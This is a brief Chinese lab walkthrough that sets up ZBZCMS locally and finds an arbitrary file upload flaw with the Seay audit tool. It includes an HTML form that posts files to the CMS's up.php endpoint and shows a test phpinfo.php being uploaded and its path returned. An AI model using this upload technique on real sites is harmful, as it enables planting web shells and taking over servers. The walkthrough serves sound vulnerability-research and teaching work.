一、phpstudy搭建zbzcms.com网站
二、使用seay源代码审计工具
1.进行自动审计,发现可疑文件上传的漏洞
2.双击打开,分析代码,添加变量输出$_FILES
添加代码如下:var_dump($_FILES);
3.在网站根目录下新建html文件内容如下
<html>
<head>
<meta charset="utf-8">
<title>xxx</title>
</head>
<body>
<form action="http://zbzcms:8002/cms/cms/include/up.php?run=file&path=./" method="post" enctype="multipart/form-data">
<label for="file">文件名:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="提交">
</form>
</body>
</html>
此处改成自己正确的url
4.用浏览器访问html文件,上传phpinfo.php文件
返回出路径